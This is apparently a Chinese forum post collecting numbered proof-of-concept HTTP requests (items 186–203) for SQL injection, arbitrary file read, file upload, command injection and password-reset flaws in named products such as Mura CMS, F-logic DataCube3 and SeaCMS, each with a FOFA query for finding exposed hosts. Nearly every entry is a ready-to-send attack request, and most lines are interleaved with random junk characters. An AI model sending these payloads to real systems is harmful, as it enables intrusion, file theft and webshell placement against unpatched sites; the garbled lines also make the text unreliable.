GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1; n2 ?0 O* p* A# \9 \' u. P
Host: host: Y8 a: `% R: o) C+ a4 ?! m i
1 @( |; X# F2 z- b+ C F% l
" ?# @- v' {) ~# g186. F-logic DataCube3 SQL注入
! j+ p/ {0 ]9 xCVE-2024-31750
. u1 }( N# e+ E. YF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
. n7 U' p) }& U) I# u- L" l. T1 b9 _FOFA:title=="DataCube3"' f1 \' c/ y+ A. [1 Y- q9 a7 o" ^
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
1 E) v$ P$ ^: r' IHost: your-ip* @( \5 l* X# p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
( Q& E# H2 Z7 J$ @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
, P. \1 s& o# R! ?* F; qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 n. p9 c+ i m0 {4 ]1 [5 G
Accept-Encoding: gzip, deflate! d8 W' w2 I8 [# r0 C- [
Connection: close
) K1 e. l% I) K1 m# F8 n" fContent-Type: application/x-www-form-urlencoded
3 Y' s) _0 Z8 M( v
/ _& Q4 M4 }& [7 ^6 |req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
" a' T2 C8 \5 ~+ b% r" Z: E" w( r# w( i H+ s$ j7 W0 n1 d. a
" }* w8 c8 J8 x( C( j3 a187. Mura CMS processAsyncObject SQL注入1 h7 Z2 a. T Q. v# e
CVE-2024-32640& z# F0 U6 A4 Y
FOFA:"Mura CMS"
8 p% q- l: }( O3 Z# N7 T4 nPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1 \( e( j: O: t
Host: your-ip6 ~( `0 h6 z; G. @
Content-Type: application/x-www-form-urlencoded3 W/ Y6 j2 U2 s& Q
/ i* \0 i h9 ], a. j% r
( f0 z1 P5 ~: {; {0 I1 A% Bobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
7 K3 ^& T7 K3 _6 D2 g
" g2 \. [" G4 I1 C
& X. J$ C4 K. u& v188. 叁体-佳会视频会议 attachment 任意文件读取
/ E% n+ c$ W4 pversion <= 3.9.7. P2 u2 P3 Q: M4 v% k4 R. n
FOFA:body="/system/get_rtc_user_defined_info?site_id"
" L0 d2 y2 m' G4 e0 O* N& J. rGET /attachment?file=/etc/passwd HTTP/1.1) _7 r: _& q8 @; O/ ]
Host: your-ip
- m* v1 Q m7 @3 I6 G' u5 R7 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% f4 T+ n2 ?- Y9 F6 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 p9 ]5 e/ W6 p# ]. V: G
Accept-Encoding: gzip, deflate
+ `* J# g. u" _% E# ?- RAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
: J! {0 P( _5 I9 i2 y) D. rConnection: close7 ?: m+ t: |+ l* [ B( t6 p
% a0 @4 P% \7 X/ ?# n! x0 ?0 A" j
189. 蓝网科技临床浏览系统 deleteStudy SQL注入4 x* y8 K5 ]5 f( {4 W
FOFA:app="LANWON-临床浏览系统"
' E1 _$ ]# M! c% j8 R% IGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
6 a! D. k2 \1 Q" f/ D7 w" [" gHost: your-ip k' E, ] b4 R4 R2 D1 U1 M6 h
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
! B5 O2 Y/ [+ n, r8 hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- O7 P; S% J; }9 a! xAccept-Encoding: gzip, deflate
% a* @4 `5 W0 W( p" ` q+ AAccept-Language: zh-CN,zh;q=0.9
* s8 B! K1 {9 u- y5 JConnection: close. u) G9 n9 s% k6 }7 U
/ N( w5 |& F: A$ B; c( K t j6 H% N# E- J
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
. l* h" I/ Z& J( [2 ~+ pFOFA:title=="短视频矩阵营销系统"
& G+ I# ~5 R4 H8 cPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
% N' a8 X) P" h, CHost: your-ip9 W2 K! U. Q& a" p" Q2 ^: b% V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36! C8 j. o* ?6 N! ?* i1 u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
( G: |, M1 V+ e$ t* c( c mContent-Type: application/x-www-form-urlencoded
: L" }3 N X5 I9 O) ~7 ~Accept-Encoding: gzip, deflate
/ I9 R9 o, d: S7 ?& b) fAccept-Language: zh-CN,zh;q=0.9
( R/ e7 x+ v& S
7 ^+ Z) K: C( @' |, s* I+ Qpoi=file:///etc/passwd5 m4 I9 ^0 }* \1 w2 e
) q: ]8 Z5 A' c7 M" a/ F$ _
! l' k, N* {+ q! {' I/ X( C6 |
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
# N% v/ J% b* L$ ?( mFOFA:body="/CDGServer3/index.jsp"
0 [* l# |: Q0 ^) d3 V- n. o: RPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
v# @% W! J% z8 P( ]Host: your-ip
' U* S. x9 y( G- H7 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 O) s% M f" D1 a
Content-Type: application/x-www-form-urlencoded
4 q3 Q' r2 h( C9 }; Y- X2 G6 D6 _# U5 ?) w2 y& l# O6 Y |$ W
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=& R3 i0 Z( X* w# Z h
# {! Q# f% Y/ E
% ~- C4 l. Y0 }6 h0 G. n192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
" e3 {. ~2 t8 }. YFOFA:title="用户登录_富通天下外贸ERP"% C, t/ a* e: K( j0 n
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
3 Y3 R( m2 W. F# j5 bHost: your-ip2 o R" i$ j0 } U4 Y' Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
" u4 {5 ^ @0 X% ~, TContent-Type: application/x-www-form-urlencoded+ F. ^% f6 ?1 ? o2 z1 S
, u4 p: ]% ]; s5 w
: l. b# t8 a3 r6 H6 d2 w: v0 k% W<% @ webhandler language="C#" class="AverageHandler" %>
, ?/ G; f0 x; b3 F& Husing System;
. i' x$ o' J$ q' tusing System.Web;9 W( f( `8 e S2 j1 Y
public class AverageHandler : IHttpHandler
$ T3 _( ^8 O! r% |' {{
, o) Z6 @+ X& }7 x K# {9 Spublic bool IsReusable& c% q4 `) f% @1 x. `( q: O! I
{ get { return true; } }4 P9 |" F$ \- C2 C0 |
public void ProcessRequest(HttpContext ctx) i( e( i4 {6 q; n( N% Z3 r
{
% d( `; ?; [; f. u' G8 Sctx.Response.Write("test");0 p, O4 d$ b; {' U+ K% |3 ]( ?7 A
}
' }( l; b8 U! t$ {1 Q2 Z2 L8 J}2 _; \6 q7 r& ~* z" _, \# p2 u" k3 J
) B5 ^% j7 Z B# N0 u7 I& y
* L/ m: K, U1 u/ F' [/ q* C193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行; {7 n' V3 N5 c+ c
FOFA:body="山石云鉴主机安全管理系统"1 y; m! S/ i6 v& M. E% ]
GET /master/ajaxActions/getTokenAction.php HTTP/1.1( S* Z- B4 ~. F/ n h% t
Host:
' a: s) y* F+ |8 j6 h) {# SCookie: PHPSESSID=2333333333333;
3 z$ ]; `- u5 QContent-Type: application/x-www-form-urlencoded4 h7 V3 r1 B3 ~0 u: N
User-Agent: Mozilla/5.0
3 i# D7 ~" f2 M# K( T# W& w
* s3 P( t% j4 C+ E" N0 z: ]6 V8 L* V/ k* A/ A$ j5 I; c+ i$ o7 T
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.19 R. B% b4 \" w+ I5 A6 U
Host:
0 u/ \/ M2 G% @2 D" C. ]User-Agent: Mozilla/5.03 ], t# J {+ a/ H; \5 B; U
Accept-Encoding: gzip, deflate
6 T j( n, _6 z& OAccept: */*
% p( a* h u7 p; ^% t! FConnection: close
8 k- G' d) C) q8 K1 {" _. FCookie: PHPSESSID=2333333333333;- x$ |) @* C+ M* I, S
Content-Type: application/x-www-form-urlencoded
" |: ~/ L/ t! `7 A- k- e3 k8 `) bContent-Length: 84) Y% W/ ~0 P2 D* t7 b$ j8 X' \
4 O/ ~. m8 A; p; H/ q$ ~param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
; H0 ]- ^( d2 x+ R
2 _* o- {/ q& S' a# i7 W
6 y" I P& T9 g1 vGET /master/img/config HTTP/1.1: b( n, K8 G2 }6 y: Y: X* E
Host:
: u3 m4 C( [5 o* ~ t1 n, U( dUser-Agent: Mozilla/5.0
9 r7 G9 ]" _8 L
$ e6 U6 k# E$ ^8 x
8 x. C# w9 N5 t194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传1 K0 Q5 J5 J: L
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
4 Z V7 k- X9 @! E7 A# _7 _, R4 S7 \; y
POST /servlet/uploadAttachmentServlet HTTP/1.1
( @, X" H4 u. o* T6 b, \- m, B+ OHost: host( C( v# H( d% M5 I0 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
G9 \! u6 y: {' ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: R4 Q; c, O* k0 q/ a) [* VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# s; k& G' b- p r1 {, rAccept-Encoding: gzip, deflate/ `* F/ Y8 G/ z
Connection: close
# u4 B# W i4 |$ A$ FContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk3 U# g0 e* q# @/ p# j0 B$ e& \
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
3 C3 {4 T4 h6 H8 f. x1 }5 O$ w2 D! |7 `, U! I: @
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"& j* u2 l9 S* p+ g
Content-Type: text/plain+ ^8 c' ]0 h) g
<% out.println("hello");%>) X |- V+ R6 n) C3 M
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
' a3 j s) m7 p5 ~+ _) u$ P# nContent-Disposition: form-data; name="json": B) B) o" u0 m, ]% z" I
{"iq":{"query":{"UpdateType":"mail"}}}
- f* u' g9 Y+ L8 q# k* Q------WebKitFormBoundaryKNt0t4vBe8cX9rZk--2 o( z& {- I- r
* V2 b7 }( H/ n) {% X; v6 u, d
; w+ k0 c3 W6 ], c* L. F% d9 `195. 飞鱼星上网行为管理系统 send_order.cgi命令执行6 X7 a, x5 A/ I7 w, [9 F( K, k0 V+ X
FOFA:title=="飞鱼星企业级智能上网行为管理系统
v9 @$ t& o& `# bPOST /send_order.cgi?parameter=operation HTTP/1.1
; s3 r; N8 K: B( c, i# X" e. MHost: 127.0.0.1# t# C2 Z. L3 h: I6 j2 P) v
Pragma: no-cache6 j# r2 j9 G5 M+ d9 Y+ X
Cache-Control: no-cache0 G3 `, b7 J+ H8 R1 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36, ~$ \6 t' c+ X
Accept: */*. a2 k2 k& }) g- _& i$ Z6 U, J
Accept-Encoding: gzip, deflate: M3 ?# `+ J( `
Accept-Language: zh-CN,zh;q=0.9) J$ k# x6 V' [7 V- M1 z/ v
Connection: close
7 G1 [8 h2 q( P4 `# UContent-Type: application/x-www-form-urlencoded
" P: u, F1 O3 wContent-Length: 68
2 a% b8 [3 ]' W' a2 z: t: b/ E
9 d+ Y M" h8 V0 {( j) e {{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
% L& S. b! u( c l
: i& t8 R6 t6 C1 A0 Z: @3 v2 J \, o$ H" e
196. 河南省风速科技统一认证平台密码重置
( w: m3 p0 e0 w5 A3 ~8 `2 AFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
" z0 i9 C) i: P% l+ `2 y: v3 V% i+ \& ?POST /cas/userCtl/resetPasswordBySuper HTTP/1.15 G; X% b9 ?* B: Z3 P; ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
! s- I% B- i) A$ N9 @. nContent-Type: application/json;charset=UTF-8# X$ ^2 y* p# \8 J9 }/ w
X-Requested-With: XMLHttpRequest& A1 w, ?+ c; \0 Y1 d9 y
Host:- T9 M6 {/ N8 l2 i
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2# A* t0 p0 {; t2 T; I0 r
Content-Length: 455 W0 F/ {+ o, ?9 M. ]
Connection: close
; f- V4 }' o7 I I. e
) g3 m8 r1 o& S0 ?5 s{"xgh":"test","newPass":"test666","email":""}3 x9 p, g5 C8 O; C# E I0 T
/ C' u$ w5 {3 l
. J3 _, o8 Z8 t/ U( v& o/ D, i7 H! c( x9 J' @8 _
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
7 s. u7 ?" w6 P- a9 v! @& s7 vFOFA:app="浙大恩特客户资源管理系统"0 I$ g' R0 K' ]( g5 x8 X! w
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1/ [+ c W+ }; y2 U, q! f$ k4 z0 B3 u
Host:+ X9 a& ^7 {: i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
5 `0 b; s6 }+ f2 P, Q. UAccept-Encoding: gzip, deflate
" C' C5 F9 G o! ~! I! ], {% ZConnection: close
" E* b( V9 u6 y& _, Q! D/ J1 o H; Y
) R7 N& ^2 V: t7 D/ q
) P$ H( D9 T- X+ `7 Z5 R6 a& g+ V/ y
198. 阿里云盘 WebDAV 命令注入9 s3 n1 d, P. M/ v3 v1 N( S
CVE-2024-29640
% G! J5 s% z# {2 {; a$ PGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
% H# z3 l6 {$ S8 y& M- m$ s; LCookie: sysauth=41273cb2cffef0bb5d0653592624cf64& }; J% q) l& q3 o2 j8 \" C1 d
Accept: */*
8 r% v y! [' O# |0 Y; a7 `+ ]2 P4 SAccept-Encoding: gzip, deflate
0 C0 ^/ X# G4 }$ NAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.66 k; @8 w# t0 e5 V) G# l+ T
Connection: close. c. F. l) n6 V- T0 b4 \$ H
2 O O% E; V# H" X5 P
4 d& [5 f. Q5 q
199. cockpit系统assetsmanager_upload接口 文件上传: D" F5 p- X- U: _; y, G+ S
/ U2 |9 u1 ?, o1 T: y/ [
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:5 z) k: a+ u4 n* y" k
GET /auth/login?to=/ HTTP/1.1
# U. \$ Y4 ]3 K6 o) V3 D6 E' }; g7 H0 M& J0 c7 C+ H
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"9 U5 ?8 S P4 S5 G
! {9 Z# k, [2 e
2.使用刚才上一步获取到的jwt获取cookie:
! `2 D6 C- t" Q- J1 O* x
0 l+ S' I! j5 L3 P2 j5 H! e/ j. b; iPOST /auth/check HTTP/1.1
0 { q2 Z/ ]' q o% U$ \6 iContent-Type: application/json1 E7 S: J1 H" m8 k1 P( v- d, \
! s9 Y) m# o! H" m" y8 g7 r3 \{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}. a5 C. f2 {) `" a
/ f5 Z, X; L1 l- g" {9 e2 J. w+ P3 Y% F响应:200,返回值:+ D/ ]6 d" f' Q; X5 e
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/6 {/ }* u* |3 r$ ^) U# ]! v
Fofa:title="Authenticate Please!"
. p+ L s' S7 F/ RPOST /assetsmanager/upload HTTP/1.1
0 Y U: e- |# a: h, r) x8 A( KContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
3 l* v, ]2 ^* m9 NCookie: mysession=95524f01e238bf51bb60d77ede3bea92/ P8 w$ a ~0 \7 J
4 l9 v. {; s% _% v; K* q) m1 S
-----------------------------36D28FBc36bd6feE7Fb39 X2 V1 F G; y6 `' r; z$ o5 ^
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
8 z: |# y3 e* D, ~9 _Content-Type: text/php K' y2 L. c1 a- H# _
( G0 D n- r& A4 {/ b9 B0 w<?php echo "tttt";unlink(__FILE__);?>
* G. S2 e4 P, r0 h" z7 O-----------------------------36D28FBc36bd6feE7Fb3 E s* N6 J+ O% Z* [3 t
Content-Disposition: form-data; name="folder"
^' r' r8 U9 |, b3 A" ], \" {
1 I2 q4 ]% _6 q) `-----------------------------36D28FBc36bd6feE7Fb3--6 N. `7 ?4 ]* t- a, ^; d0 W i. J
' _* Y6 I& J0 B! V- s
2 U; v0 a9 m* @5 j; R- W. s, X
/storage/uploads/tttt.php
" A# |: Q6 r6 \6 P& r0 ~: D$ p/ X( ~) K3 `& h/ q
200. SeaCMS海洋影视管理系统dmku SQL注入* U; t4 R7 Z" z# |* V
FOFA:app="海洋CMS"
3 i$ L% Q* Y" `5 fGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
( K4 u; N+ K8 o* w+ w& t- k& sCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
. f! z9 C! K6 y5 c" }- YUpgrade-Insecure-Requests: 1
7 q) `: `# C9 B2 J5 vCache-Control: max-age=08 T! f: ?5 P" ^% s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 y( g1 h: F4 t- W4 N5 b2 a1 q: H- sAccept-Encoding: gzip, deflate/ k; S% f6 f) s& \+ }
Accept-Language: zh-CN,zh;q=0.9; l& | ^" \+ ^, v. O. G6 a/ I
" R' p& J! m, X; R' l9 Y
! a4 K- e/ M( K/ [201. 方正全媒体新闻采编系统 binary SQL注入2 Z# R6 i$ O& \, s* l
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
! Y/ S% `, l, y9 ~9 g! D) APOST /newsedit/newsplan/task/binary.do HTTP/1.1" ^4 [2 k; j# i% u" k7 W8 w
Content-Type: application/x-www-form-urlencoded! ?$ h2 \6 P4 u4 s0 m1 z; _: i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 h% u5 u- d1 I" fAccept-Encoding: gzip, deflate# {4 V: F' ~: P2 l) m( ]/ V
Accept-Language: zh-CN,zh;q=0.9
$ j8 B$ U6 S% P7 _4 g0 q$ fConnection: close' _' H3 L: r! t9 b; d4 ?& S
' t D. r* z- ~" Q/ W7 Q$ a
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
; \* M1 V- \" K+ i, v
1 C( j% z3 e2 M% M9 l' P5 J! `; q" z/ Z3 L
202. 微擎系统 AccountEdit任意文件上传3 j- [, L. i$ w+ B4 |) B
FOFA:body="/Widgets/WidgetCollection/"
( T3 Y% c5 R, z& T& F获取__VIEWSTATE和__EVENTVALIDATION值* x n0 \- {4 L- _. ?- W; e7 P. V
GET /User/AccountEdit.aspx HTTP/1.1
5 I9 [7 c, K5 t1 D9 k3 K# xHost: 滑板人之家) l( P$ d- |& N! x8 E) _$ E4 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
4 I7 N, M( C* _! u; RContent-Length: 03 W3 \, j2 X- H! V
4 J# S8 ~ h1 v8 s4 Q# y
- o/ V7 H7 T. v9 M- q" t% d1 W
替换__VIEWSTATE和__EVENTVALIDATION值
& o4 p: o. Q. K6 x+ e' W: zPOST /User/AccountEdit.aspx HTTP/1.1
0 `) f2 d4 ~1 G; w q+ `4 N, |: bAccept-Encoding: gzip, deflate, br1 a: t3 F) P1 f
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
: j0 R2 {+ O7 t) h0 b! a. T6 g- ^( O9 [. @* c0 a/ D+ c+ |* _! [. b
-----------------------------786435874t385875938657365873465673587356871 ?9 z6 T- N& [
Content-Disposition: form-data; name="__VIEWSTATE"7 n0 q0 [0 H: C& u+ L0 Z- R
( o6 d" v; v2 w/ }8 ^8 n, I/ s__VIEWSTATE
2 @ b5 M( F: Z-----------------------------786435874t385875938657365873465673587356878 o: a0 X) z- P! Q
Content-Disposition: form-data; name="__EVENTVALIDATION"
9 u- O# m5 e( _, q K" I# |/ G5 `/ A. ~7 W8 C4 U
__EVENTVALIDATION; \) }0 K0 Z* t1 q" {* l9 m9 F
-----------------------------786435874t385875938657365873465673587356876 M. S, ~9 G" _/ s
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
* r: L" ]9 d A! Q! gContent-Type: text/plain
0 U4 `. l7 p* G
2 m4 E6 F5 d' t% @Hello World!" u) a- F2 ? a; {& k0 L! V6 T+ w
-----------------------------786435874t38587593865736587346567358735687. i( r% o+ u' T
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
8 e2 V' y: C4 u$ b+ d0 p: t& z, t+ Y _: \/ b
上传图片7 r2 p8 T' I" B5 F) Z4 R
-----------------------------786435874t38587593865736587346567358735687
f" ?% X: B0 N! n5 iContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"7 ^" j8 d6 X9 z& [* V( x' @
$ N1 d. o6 C' L; G
3 h! {: B: n( F) [* ^$ I4 L5 n
-----------------------------786435874t38587593865736587346567358735687
8 Y# `1 P; U5 ` W4 C* Z# xContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"7 X7 s$ _% M$ a3 B+ X$ @% s# \, R5 z1 K
. J @0 d+ x3 X* ^5 s
' g+ {, r. S* }+ l& S$ L/ M
-----------------------------786435874t38587593865736587346567358735687--! q; N5 H% i5 v) n
* f# q# O# M7 V/ V$ x
( { }2 R( }* K1 W/_data/Uploads/1123.txt( r) h( M* Y. y8 v% y
7 `) F, i1 {4 P! T/ g/ X
203. 红海云EHR PtFjk 文件上传0 X" y& `1 X! d5 Z- \
FOFA:body="RedseaPlatform"
3 r1 v% M0 e7 G* [2 z# |* O, PPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
+ f, s+ c% ~1 hHost: x.x.x.x+ J7 e1 g1 }1 F
Accept-Encoding: gzip% P) |! v1 r) r7 c* Z. L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! q: u- e2 G/ W- aContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4) t" |$ _ \7 F
Content-Length: 210
* i+ G! H4 y) E- P6 ]4 c2 v, Y: n3 ^' @/ _; ?+ r3 `( s
------WebKitFormBoundaryt7WbDl1tXogoZys4: X# z6 Q& ]% ?3 D+ _% c$ S2 N
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
! Q' S4 F4 |, T- `+ yContent-Type:image/jpeg: G9 C9 Z* s3 J& {
7 T5 q7 s8 ?* g. j/ [4 T; V<% out.print("hello,eHR");%>6 G$ A+ C" }/ L/ `( j! d; {) u
------WebKitFormBoundaryt7WbDl1tXogoZys4--
6 l: \; {+ v: v5 F! @" z' D+ m: r4 r/ `" c$ @4 o8 A
1 ]6 L) }5 ^* D3 i `. R$ H S9 v
4 |. s0 \# q; B2 ?0 F
" X" C% ^ Y/ c1 J1 j# R! P0 c/ y! d4 g: l3 z& h
7 g- \5 N4 u1 |
|
发表于 2024-6-5 14:31:29
收藏
支持
反对